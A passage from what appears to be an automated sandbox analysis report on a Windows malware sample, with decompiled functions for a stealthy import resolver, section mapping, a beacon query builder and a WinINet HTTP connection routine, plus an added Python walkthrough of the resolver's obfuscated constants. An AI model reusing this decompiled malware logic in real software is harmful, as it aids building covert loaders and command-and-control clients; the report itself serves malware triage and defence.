            • API ID: Section$CreateViewmemset
            • String ID: @
            • API String ID: 2533685722-2766056989
            • Opcode ID: 232f3a30dcae69e5963f78d425f34a7bb228badb3687228d0737aca19cbd4a2f
            • Instruction ID: 902b655066e6f1ef2c1749b59dddf7677aeeae3e3ffa194d207bc0e2506ab0da
            • Opcode Fuzzy Hash: 232f3a30dcae69e5963f78d425f34a7bb228badb3687228d0737aca19cbd4a2f
            • Instruction Fuzzy Hash: 38214DB1D00209AFDB10DFA9C8809EEFBB9FF48314F10453AE616F7250D734AA048B64
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00401000(void* __edi, intOrPtr _a4) {
            				signed int _v8;
            				intOrPtr* _v12;
            				_Unknown_base(*)()** _v16;
            				signed int _v20;
            				signed short _v24;
            				struct HINSTANCE__* _v28;
            				intOrPtr _t43;
            				intOrPtr* _t45;
            				intOrPtr _t46;
            				struct HINSTANCE__* _t47;
            				intOrPtr* _t49;
            				intOrPtr _t50;
            				signed short _t51;
            				_Unknown_base(*)()* _t53;
            				CHAR* _t54;
            				_Unknown_base(*)()* _t55;
            				void* _t58;
            				signed int _t59;
            				_Unknown_base(*)()* _t60;
            				intOrPtr _t61;
            				intOrPtr _t65;
            				signed int _t68;
            				void* _t69;
            				CHAR* _t71;
            				signed short* _t73;
            
            				_t69 = __edi;
            				_v20 = _v20 & 0x00000000;
            				_t59 =  *0x404180;
            				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x18bad598));
            				if(_t43 != 0) {
            					_t45 = _t43 + __edi;
            					_v12 = _t45;
            					_t46 =  *((intOrPtr*)(_t45 + 0xc));
            					if(_t46 != 0) {
            						while(1) {
            							_t71 = _t46 + _t69;
            							_t47 = LoadLibraryA(_t71); // executed
            							_v28 = _t47;
            							if(_t47 == 0) {
            								break;
            							}
            							_v24 = _v24 & 0x00000000;
            							 *_t71 = _t59 - 0x43175ac3;
            							_t49 = _v12;
            							_t61 =  *((intOrPtr*)(_t49 + 0x10));
            							_t50 =  *_t49;
            							if(_t50 != 0) {
            								L6:
            								_t73 = _t50 + _t69;
            								_v16 = _t61 + _t69;
            								while(1) {
            									_t51 =  *_t73;
            									if(_t51 == 0) {
            										break;
            									}
            									if(__eflags < 0) {
            										__eflags = _t51 - _t69;
            										if(_t51 < _t69) {
            											L12:
            											_t21 =  &_v8;
            											 *_t21 = _v8 & 0x00000000;
            											__eflags =  *_t21;
            											_v24 =  *_t73 & 0x0000ffff;
            										} else {
            											_t65 = _a4;
            											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
            											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
            												goto L12;
            											} else {
            												goto L11;
            											}
            										}
            									} else {
            										_t51 = _t51 + _t69;
            										L11:
            										_v8 = _t51;
            									}
            									_t53 = _v8;
            									__eflags = _t53;
            									if(_t53 == 0) {
            										_t54 = _v24 & 0x0000ffff;
            									} else {
            										_t54 = _t53 + 2;
            									}
            									_t55 = GetProcAddress(_v28, _t54);
            									__eflags = _t55;
            									if(__eflags == 0) {
            										_v20 = _t59 - 0x43175a44;
            									} else {
            										_t68 = _v8;
            										__eflags = _t68;
            										if(_t68 != 0) {
            											 *_t68 = _t59 - 0x43175ac3;
            										}
            										 *_v16 = _t55;
            										_t58 = _t59 * 4 - 0xc5d6b08;
            										_t73 = _t73 + _t58;
            										_t32 =  &_v16;
            										 *_t32 = _v16 + _t58;
            										__eflags =  *_t32;
            										continue;
            									}
            									goto L23;
            								}
            							} else {
            								_t50 = _t61;
            								if(_t61 != 0) {
            									goto L6;
            								}
            							}
            							L23:
            							_v12 = _v12 + 0x14;
            							_t46 =  *((intOrPtr*)(_v12 + 0xc));
            							if(_t46 != 0) {
            								continue;
            							} else {
            							}
            							L26:
            							goto L27;
            						}
            						_t60 = _t59 + 0xbce8a5bb;
            						__eflags = _t60;
            						_v20 = _t60;
            						goto L26;
            					}
            				}
            				L27:
            				return _v20;
            			}

            APIs
            • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 00401038
            • GetProcAddress.KERNEL32(?,00000000), ref: 004010AA
            Memory Dump Source
            • Source File: 00000000.00000002.509472273.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.509472273.0000000000403000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.509472273.0000000000405000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.509472273.0000000000407000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: AddressLibraryLoadProc
            • String ID:
            • API String ID: 2574300362-0
            • Opcode ID: 2dcea5e48fff28511091e29e6b6fdd6310ca7cbb91058c8f3908306a93af5937
            • Instruction ID: 069ebb05316bb06cd12a0d66d81b5033da0b120a8bf666a49d589dbfec54084e
            • Opcode Fuzzy Hash: 2dcea5e48fff28511091e29e6b6fdd6310ca7cbb91058c8f3908306a93af5937
            • Instruction Fuzzy Hash: 65314975E0020ADFDB14CF59C980AAAB7F4BF04301B24407AD981FB7A0E779DA81CB58
            Uniqueness

            Uniqueness Score: -1.00%
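            E00401000 is the loader's own import resolver. It reads the import data directory from the IMAGE_NT_HEADERS that _a4 points to, walks IMAGE_IMPORT_DESCRIPTOR entries with stride 0x14, calls LoadLibraryA on each DLL name, resolves every thunk with GetProcAddress by name (IMAGE_IMPORT_BY_NAME, string at +2) or by ordinal (high bit set), stores the result through _v16 into the IAT, and then writes zero over the DLL name and the hint/name entry it has just used. The remaining constants are hidden behind arithmetic on the global at 0x404180. Assuming that global holds 0x43175AC3, the value that makes the overwrite `_t59 - 0x43175ac3` zero (an inference, not something the report states), the other expressions evaluate modulo 2^32 to 0x80 (offset of DataDirectory[IMPORT].VirtualAddress in IMAGE_NT_HEADERS32), 4 (thunk stride), 0x7F (ERROR_PROC_NOT_FOUND, the GetProcAddress failure path) and 0x7E (ERROR_MOD_NOT_FOUND, the LoadLibraryA failure path), which is what a hand-written loader would return. The Python below is an added example, neither the sample's code nor the report's: it evaluates those expressions and walks a constructed, flat (RVA equals offset) import table with the standard PE semantics this function implements; the decompiler's range checks are reduced to the ordinal flag plus the SizeOfImage bound.

```python
import struct

IMAGE_ORDINAL_FLAG32 = 0x80000000
IMPORT_DESCRIPTOR_SIZE = 0x14      # sizeof(IMAGE_IMPORT_DESCRIPTOR), the literal 0x14 in the listing
NT_IMPORT_DIR_RVA_OFFSET = 0x80    # IMAGE_NT_HEADERS32 -> OptionalHeader.DataDirectory[1].VirtualAddress
NT_SIZEOF_IMAGE_OFFSET = 0x50      # IMAGE_NT_HEADERS32 -> OptionalHeader.SizeOfImage
KEY = 0x43175AC3                   # assumed content of *0x404180 (makes the name overwrite a zero)


def resolve_opaque_constants(key=KEY):
    """Evaluate the key-relative expressions of E00401000 modulo 2**32."""
    m = 0xFFFFFFFF
    return {
        "zero": (key - 0x43175AC3) & m,               # value written over used names
        "import_dir_offset": (key * 8 - 0x18BAD598) & m,
        "thunk_stride": (key * 4 - 0x0C5D6B08) & m,
        "err_getprocaddress": (key - 0x43175A44) & m,
        "err_loadlibrary": (key + 0xBCE8A5BB) & m,
    }


def _u32(image, off):
    return struct.unpack_from("<I", image, off)[0]


def _cstr(image, off):
    end = image.index(b"\0", off)
    return image[off:end].decode("ascii")


def walk_imports(image, nt_offset, erase_names=False):
    """Return [(dll, [name_or_ordinal, ...]), ...] for a flat 32-bit image (RVA == offset).

    erase_names mirrors the loader's post-resolution writes of zero to the DLL name
    and to the hint/name entry (approximated here as the first byte of each string).
    """
    size_of_image = _u32(image, nt_offset + NT_SIZEOF_IMAGE_OFFSET)
    desc = _u32(image, nt_offset + NT_IMPORT_DIR_RVA_OFFSET)
    imports = []
    if desc == 0:
        return imports
    while True:
        name_rva = _u32(image, desc + 0x0C)
        if name_rva == 0:                       # all-zero descriptor terminates the table
            break
        dll = _cstr(image, name_rva)
        # OriginalFirstThunk, falling back to FirstThunk when it is zero, as the listing does
        thunk = _u32(image, desc) or _u32(image, desc + 0x10)
        entries = []
        while thunk:
            entry = _u32(image, thunk)
            if entry == 0:
                break
            if entry & IMAGE_ORDINAL_FLAG32 or entry >= size_of_image:
                entries.append(entry & 0xFFFF)          # import by ordinal (out-of-image RVA treated the same)
            else:
                entries.append(_cstr(image, entry + 2)) # IMAGE_IMPORT_BY_NAME: WORD Hint; CHAR Name[]
                if erase_names:
                    image[entry + 2] = 0
            thunk += 4
        if erase_names:
            image[name_rva] = 0
        imports.append((dll, entries))
        desc += IMPORT_DESCRIPTOR_SIZE
    return imports


def build_sample_image():
    """Constructed minimal flat image: not a real PE, only the fields the walker reads."""
    img = bytearray(0x400)
    nt = 0x80
    struct.pack_into("<I", img, nt + NT_SIZEOF_IMAGE_OFFSET, len(img))
    struct.pack_into("<I", img, nt + NT_IMPORT_DIR_RVA_OFFSET, 0x200)
    # IMAGE_IMPORT_DESCRIPTOR: OriginalFirstThunk, TimeDateStamp, ForwarderChain, Name, FirstThunk;
    # the terminating all-zero descriptor at 0x214 is already zero.
    struct.pack_into("<5I", img, 0x200, 0x240, 0, 0, 0x300, 0x260)
    struct.pack_into("<3I", img, 0x240, 0x310, IMAGE_ORDINAL_FLAG32 | 16, 0)   # INT
    struct.pack_into("<3I", img, 0x260, 0x310, IMAGE_ORDINAL_FLAG32 | 16, 0)   # IAT (pre-resolution copy)
    img[0x300:0x30D] = b"kernel32.dll\0"
    struct.pack_into("<H", img, 0x310, 0x123)                                  # hint
    img[0x312:0x321] = b"GetProcAddress\0"
    return img, nt


if __name__ == "__main__":
    print({k: hex(v) for k, v in resolve_opaque_constants().items()})
    img, nt = build_sample_image()
    print(walk_imports(img, nt, erase_names=True))
    print(img[0x300], img[0x312])   # names are gone after the walk
```

            The erase step matters for triage: a dump taken after this function has run no longer contains the import names, so string-based identification of the loader's dependencies has to come from an earlier snapshot or from the resolved IAT addresses.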

            C-Code - Quality: 68%
            			E00401459(void** __esi, PVOID* _a4) {
            				long _v8;
            				void* _v12;
            				void* _v16;
            				long _t13;
            
            				_v16 = 0;
            				asm("stosd");
            				_v8 = 0;
            				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
            				if(_t13 < 0) {
            					_push(_t13);
            					return __esi[6]();
            				}
            				return 0;
            			}

            APIs
            • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0040117D,00000002,00000000,?,?,00000000,?,?,0040117D,00000002), ref: 00401486
            Memory Dump Source
            • Source File: 00000000.00000002.509472273.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.509472273.0000000000403000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.509472273.0000000000405000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.509472273.0000000000407000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: SectionView
            • String ID:
            • API String ID: 1323581903-0
            • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
            • Instruction ID: 2ffffb3a0e1fef12aabb3d262299a14fd526f72662b70b4f27343324966f1358
            • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
            • Instruction Fuzzy Hash: E9F037B590020CFFDB11DFA5CC85CAFBBBDEB44354B10493AF552E50A0D6309E089B60
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 69%
            			E007E3CE0(long __eax, void* __ecx, void* __edx, void* _a12, intOrPtr _a20) {
            				intOrPtr _v4;
            				intOrPtr _v8;
            				intOrPtr _v16;
            				intOrPtr _v20;
            				intOrPtr _v24;
            				intOrPtr _v28;
            				intOrPtr _v32;
            				void* _v48;
            				intOrPtr _v56;
            				void* __edi;
            				intOrPtr _t30;
            				void* _t31;
            				intOrPtr _t33;
            				intOrPtr _t34;
            				intOrPtr _t35;
            				intOrPtr _t36;
            				intOrPtr _t37;
            				void* _t40;
            				intOrPtr _t41;
            				int _t44;
            				intOrPtr _t45;
            				int _t48;
            				void* _t49;
            				intOrPtr _t53;
            				intOrPtr _t59;
            				intOrPtr _t63;
            				intOrPtr* _t65;
            				void* _t66;
            				intOrPtr _t71;
            				intOrPtr _t77;
            				intOrPtr _t80;
            				intOrPtr _t83;
            				int _t86;
            				intOrPtr _t88;
            				int _t91;
            				intOrPtr _t93;
            				int _t96;
            				void* _t98;
            				void* _t99;
            				void* _t103;
            				void* _t105;
            				void* _t106;
            				intOrPtr _t107;
            				long _t109;
            				intOrPtr* _t110;
            				intOrPtr* _t111;
            				long _t112;
            				int _t113;
            				void* _t114;
            				void* _t115;
            				void* _t116;
            				void* _t119;
            				void* _t120;
            				void* _t122;
            				void* _t123;
            
            				_t103 = __edx;
            				_t99 = __ecx;
            				_t120 =  &_v16;
            				_t112 = __eax;
            				_t30 =  *0x7ea3e0; // 0x2f19c48
            				_v4 = _t30;
            				_v8 = 8;
            				_t31 = RtlAllocateHeap( *0x7ea2d8, 0, 0x800); // executed
            				_t98 = _t31;
            				if(_t98 != 0) {
            					if(_t112 == 0) {
            						_t112 = GetTickCount();
            					}
            					_t33 =  *0x7ea018; // 0x242da616
            					asm("bswap eax");
            					_t34 =  *0x7ea014; // 0x3a87c8cd
            					asm("bswap eax");
            					_t35 =  *0x7ea010; // 0xd8d2f808
            					asm("bswap eax");
            					_t36 =  *0x7ea00c; // 0xeec43f25
            					asm("bswap eax");
            					_t37 =  *0x7ea348; // 0x272d5a8
            					_t3 = _t37 + 0x7eb5ac; // 0x74666f73
            					_t113 = wsprintfA(_t98, _t3, 2, 0x3d18f, _t36, _t35, _t34, _t33,  *0x7ea02c,  *0x7ea004, _t112);
            					_t40 = E007E467F();
            					_t41 =  *0x7ea348; // 0x272d5a8
            					_t4 = _t41 + 0x7eb575; // 0x74707526
            					_t44 = wsprintfA(_t113 + _t98, _t4, _t40);
            					_t122 = _t120 + 0x38;
            					_t114 = _t113 + _t44;
            					if(_a12 != 0) {
            						_t93 =  *0x7ea348; // 0x272d5a8
            						_t8 = _t93 + 0x7eb508; // 0x732526
            						_t96 = wsprintfA(_t114 + _t98, _t8, _a12);
            						_t122 = _t122 + 0xc;
            						_t114 = _t114 + _t96;
            					}
            					_t45 =  *0x7ea348; // 0x272d5a8
            					_t10 = _t45 + 0x7eb246; // 0x74636126
            					_t48 = wsprintfA(_t114 + _t98, _t10, 0);
            					_t123 = _t122 + 0xc;
            					_t115 = _t114 + _t48; // executed
            					_t49 = E007E472F(_t99); // executed
            					_t105 = _t49;
            					if(_t105 != 0) {
            						_t88 =  *0x7ea348; // 0x272d5a8
            						_t12 = _t88 + 0x7eb8d0; // 0x736e6426
            						_t91 = wsprintfA(_t115 + _t98, _t12, _t105);
            						_t123 = _t123 + 0xc;
            						_t115 = _t115 + _t91;
            						HeapFree( *0x7ea2d8, 0, _t105);
            					}
            					_t106 = E007E1340();
            					if(_t106 != 0) {
            						_t83 =  *0x7ea348; // 0x272d5a8
            						_t14 = _t83 + 0x7eb8c5; // 0x6f687726
            						_t86 = wsprintfA(_t115 + _t98, _t14, _t106);
            						_t123 = _t123 + 0xc;
            						_t115 = _t115 + _t86;
            						HeapFree( *0x7ea2d8, 0, _t106);
            					}
            					_t107 =  *0x7ea3cc; // 0x2f19600
            					_a20 = E007E6B59( &E007EA00A, _t107 + 4);
            					_t53 =  *0x7ea36c; // 0x2f195b0
            					_t109 = 0;
            					if(_t53 != 0) {
            						_t80 =  *0x7ea348; // 0x272d5a8
            						_t17 = _t80 + 0x7eb8be; // 0x3d736f26
            						wsprintfA(_t115 + _t98, _t17, _t53);
            					}
            					if(_a20 != _t109) {
            						_t116 = RtlAllocateHeap( *0x7ea2d8, _t109, 0x800);
            						if(_t116 != _t109) {
            							E007E2915(GetTickCount());
            							_t59 =  *0x7ea3cc; // 0x2f19600
            							__imp__(_t59 + 0x40);
            							asm("lock xadd [eax], ecx");
            							_t63 =  *0x7ea3cc; // 0x2f19600
            							__imp__(_t63 + 0x40);
            							_t65 =  *0x7ea3cc; // 0x2f19600
            							_t66 = E007E6675(1, _t103, _t98,  *_t65); // executed
            							_t119 = _t66;
            							asm("lock xadd [eax], ecx");
            							if(_t119 != _t109) {
            								StrTrimA(_t119, 0x7e9280);
            								_push(_t119);
            								_t71 = E007E7563();
            								_v20 = _t71;
            								if(_t71 != _t109) {
            									_t110 = __imp__;
            									 *_t110(_t119, _v8);
            									 *_t110(_t116, _v8);
            									_t111 = __imp__;
            									 *_t111(_t116, _v32);
            									 *_t111(_t116, _t119);
            									_t77 = E007E21A6(0xffffffffffffffff, _t116, _v28, _v24); // executed
            									_v56 = _t77;
            									if(_t77 != 0 && _t77 != 0x10d2) {
            										E007E63F6();
            									}
            									HeapFree( *0x7ea2d8, 0, _v48);
            									_t109 = 0;
            								}
            								HeapFree( *0x7ea2d8, _t109, _t119);
            							}
            							RtlFreeHeap( *0x7ea2d8, _t109, _t116); // executed
            						}
            						HeapFree( *0x7ea2d8, _t109, _a12);
            					}
            					RtlFreeHeap( *0x7ea2d8, _t109, _t98); // executed
            				}
            				return _v16;
            			}

            APIs
            • RtlAllocateHeap.NTDLL ref: 007E3D08
            • GetTickCount.KERNEL32 ref: 007E3D1C
            • wsprintfA.USER32 ref: 007E3D6B
            • wsprintfA.USER32 ref: 007E3D88
            • wsprintfA.USER32 ref: 007E3DA9
            • wsprintfA.USER32 ref: 007E3DC1
            • wsprintfA.USER32 ref: 007E3DE4
            • HeapFree.KERNEL32(00000000,00000000), ref: 007E3DF4
            • wsprintfA.USER32 ref: 007E3E16
            • HeapFree.KERNEL32(00000000,00000000), ref: 007E3E26
            • wsprintfA.USER32 ref: 007E3E5E
            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 007E3E79
            • GetTickCount.KERNEL32 ref: 007E3E89
            • RtlEnterCriticalSection.NTDLL(02F195C0), ref: 007E3E9D
            • RtlLeaveCriticalSection.NTDLL(02F195C0), ref: 007E3EBB
              • Part of subcall function 007E6675: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,7491C740,007E3ECE,00000000,02F19600), ref: 007E66A0
              • Part of subcall function 007E6675: lstrlen.KERNEL32(00000000,?,7491C740,007E3ECE,00000000,02F19600), ref: 007E66A8
              • Part of subcall function 007E6675: strcpy.NTDLL ref: 007E66BF
              • Part of subcall function 007E6675: lstrcat.KERNEL32(00000000,00000000), ref: 007E66CA
              • Part of subcall function 007E6675: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,007E3ECE,?,7491C740,007E3ECE,00000000,02F19600), ref: 007E66E7
            • StrTrimA.SHLWAPI(00000000,007E9280,00000000,02F19600), ref: 007E3EED
              • Part of subcall function 007E7563: lstrlen.KERNEL32(02F19C38,00000000,00000000,00000000,007E3EF9,00000000), ref: 007E7573
              • Part of subcall function 007E7563: lstrlen.KERNEL32(?), ref: 007E757B
              • Part of subcall function 007E7563: lstrcpy.KERNEL32(00000000,02F19C38), ref: 007E758F
              • Part of subcall function 007E7563: lstrcat.KERNEL32(00000000,?), ref: 007E759A
            • lstrcpy.KERNEL32(00000000,?), ref: 007E3F0C
            • lstrcpy.KERNEL32(00000000,?), ref: 007E3F13
            • lstrcat.KERNEL32(00000000,?), ref: 007E3F20
            • lstrcat.KERNEL32(00000000,00000000), ref: 007E3F24
              • Part of subcall function 007E21A6: WaitForSingleObject.KERNEL32(00000000,74CF81D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 007E2258
            • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 007E3F54
            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 007E3F64
            • RtlFreeHeap.NTDLL(00000000,00000000,00000000,02F19600), ref: 007E3F72
            • HeapFree.KERNEL32(00000000,?), ref: 007E3F83
            • RtlFreeHeap.NTDLL(00000000,00000000), ref: 007E3F91
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: Heap$Freewsprintf$lstrcatlstrlen$lstrcpy$AllocateCountCriticalSectionTickTrim$EnterLeaveObjectSingleWaitstrcpy
            • String ID:
            • API String ID: 186568778-0
            • Opcode ID: fae3fb8cc6bdc9323a366cf6ee5facfb5f8f311d3ca04d313769bc2e10160ebf
            • Instruction ID: 877edabc90f8e239b187afc92a467fa083be166ec75754e1e5ee2abdb92e1c31
            • Opcode Fuzzy Hash: fae3fb8cc6bdc9323a366cf6ee5facfb5f8f311d3ca04d313769bc2e10160ebf
            • Instruction Fuzzy Hash: 5C719072502285BFC711AB66DCC9E573BE8FB8C700B058524F609DB231E63DE905DB6A
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 92%
            			E007E7B83(void* __eax, void* __ecx, long __esi, char* _a4) {
            				void _v8;
            				long _v12;
            				void _v16;
            				void* _t34;
            				void* _t38;
            				void* _t40;
            				char* _t56;
            				long _t57;
            				void* _t58;
            				intOrPtr _t59;
            				long _t65;
            
            				_t65 = __esi;
            				_t58 = __ecx;
            				_v16 = 0xea60;
            				__imp__( *(__esi + 4));
            				_v12 = __eax + __eax;
            				_t56 = E007E33DC(__eax + __eax + 1);
            				if(_t56 != 0) {
            					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
            						E007E61DA(_t56);
            					} else {
            						E007E61DA( *(__esi + 4));
            						 *(__esi + 4) = _t56;
            					}
            				}
            				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
            				 *(_t65 + 0x10) = _t34;
            				if(_t34 == 0 || InternetSetStatusCallback(_t34, E007E7B18) == 0xffffffff) {
            					L15:
            					return GetLastError();
            				} else {
            					ResetEvent( *(_t65 + 0x1c));
            					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
            					 *(_t65 + 0x14) = _t38;
            					if(_t38 != 0 || GetLastError() == 0x3e5 && E007E16B2( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
            						_t59 =  *0x7ea348; // 0x272d5a8
            						_t15 = _t59 + 0x7eb845; // 0x544547
            						_v8 = 0x84404000;
            						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65); // executed
            						 *(_t65 + 0x18) = _t40;
            						if(_t40 == 0) {
            							goto L15;
            						}
            						_t57 = 4;
            						_v12 = _t57;
            						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
            							_v8 = _v8 | 0x00000100;
            							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
            						}
            						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
            							goto L15;
            						} else {
            							return 0;
            						}
            					} else {
            						goto L15;
            					}
            				}
            			}

            APIs
            • lstrlen.KERNEL32(?,00000008,74CB4D40), ref: 007E7B95
              • Part of subcall function 007E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,007E62F6), ref: 007E33E8
            • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 007E7BB8
            • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 007E7BE0
            • InternetSetStatusCallback.WININET(00000000,007E7B18), ref: 007E7BF7
            • ResetEvent.KERNEL32(?), ref: 007E7C09
            • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 007E7C1C
            • GetLastError.KERNEL32 ref: 007E7C29
            • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 007E7C6F
            • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 007E7C8D
            • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 007E7CAE
            • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 007E7CBA
            • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 007E7CCA
            • GetLastError.KERNEL32 ref: 007E7CD4
              • Part of subcall function 007E61DA: RtlFreeHeap.NTDLL(00000000,00000000,007E6383,00000000,?,00000000,00000000), ref: 007E61E6
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
            • String ID:
            • API String ID: 2290446683-0
            • Opcode ID: ee2d140c07e500b1643e5576e692e4aae5982ff3a1f5446e03e6462326bf2ef1
            • Instruction ID: 29a3c2a0bf4305adaddf5277df30cbf39218ea4ae7acc8f2992db138c447ae66
            • Opcode Fuzzy Hash: ee2d140c07e500b1643e5576e692e4aae5982ff3a1f5446e03e6462326bf2ef1
            • Instruction Fuzzy Hash: 07419F71501288BFDB319F66DC88E5B7BBDEB8C700F204918F602D61A0E738AA45CB31
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 51%
            			E007E7FC5(long _a4, long _a8) {
            				signed int _v8;
            				intOrPtr _v16;
            				LONG* _v28;
            				long _v40;
            				long _v44;
            				long _v48;
            				CHAR* _v52;
            				long _v56;
            				CHAR* _v60;
            				long _v64;
            				signed int* _v68;
            				char _v72;
            				signed int _t76;
            				signed int _t80;
            				signed int _t81;
            				intOrPtr* _t82;
            				intOrPtr* _t83;
            				intOrPtr* _t85;
            				intOrPtr* _t90;
            				intOrPtr* _t95;
            				intOrPtr* _t98;
            				struct HINSTANCE__* _t99;
            				void* _t102;
            				intOrPtr* _t104;
            				void* _t115;
            				long _t116;
            				void _t125;
            				void* _t131;
            				signed short _t133;
            				struct HINSTANCE__* _t138;
            				signed int* _t139;
            
            				_t139 = _a4;
            				_v28 = _t139[2] + 0x7e0000;
            				_t115 = _t139[3] + 0x7e0000;
            				_t131 = _t139[4] + 0x7e0000;
            				_v8 = _t139[7];
            				_v60 = _t139[1] + 0x7e0000;
            				_v16 = _t139[5] + 0x7e0000;
            				_v64 = _a8;
            				_v72 = 0x24;
            				_v68 = _t139;
            				_v56 = 0;
            				asm("stosd");
            				_v48 = 0;
            				_v44 = 0;
            				_v40 = 0;
            				if(( *_t139 & 0x00000001) == 0) {
            					_a8 =  &_v72;
            					RaiseException(0xc06d0057, 0, 1,  &_a8);
            					return 0;
            				}
            				_t138 =  *_v28;
            				_t76 = _a8 - _t115 >> 2 << 2;
            				_t133 =  *(_t131 + _t76);
            				_a4 = _t76;
            				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
            				_v56 = _t80;
            				_t81 = _t133 + 0x7e0002;
            				if(_t80 == 0) {
            					_t81 = _t133 & 0x0000ffff;
            				}
            				_v52 = _t81;
            				_t82 =  *0x7ea1c0; // 0x0
            				_t116 = 0;
            				if(_t82 == 0) {
            					L6:
            					if(_t138 != 0) {
            						L18:
            						_t83 =  *0x7ea1c0; // 0x0
            						_v48 = _t138;
            						if(_t83 != 0) {
            							_t116 =  *_t83(2,  &_v72);
            						}
            						if(_t116 != 0) {
            							L32:
            							 *_a8 = _t116;
            							L33:
            							_t85 =  *0x7ea1c0; // 0x0
            							if(_t85 != 0) {
            								_v40 = _v40 & 0x00000000;
            								_v48 = _t138;
            								_v44 = _t116;
            								 *_t85(5,  &_v72);
            							}
            							return _t116;
            						} else {
            							if(_t139[5] == _t116 || _t139[7] == _t116) {
            								L27:
            								_t116 = GetProcAddress(_t138, _v52);
            								if(_t116 == 0) {
            									_v40 = GetLastError();
            									_t90 =  *0x7ea1bc; // 0x0
            									if(_t90 != 0) {
            										_t116 =  *_t90(4,  &_v72);
            									}
            									if(_t116 == 0) {
            										_a4 =  &_v72;
            										RaiseException(0xc06d007f, _t116, 1,  &_a4);
            										_t116 = _v44;
            									}
            								}
            								goto L32;
            							} else {
            								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
            								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
            									_t116 =  *(_a4 + _v16);
            									if(_t116 != 0) {
            										goto L32;
            									}
            								}
            								goto L27;
            							}
            						}
            					}
            					_t98 =  *0x7ea1c0; // 0x0
            					if(_t98 == 0) {
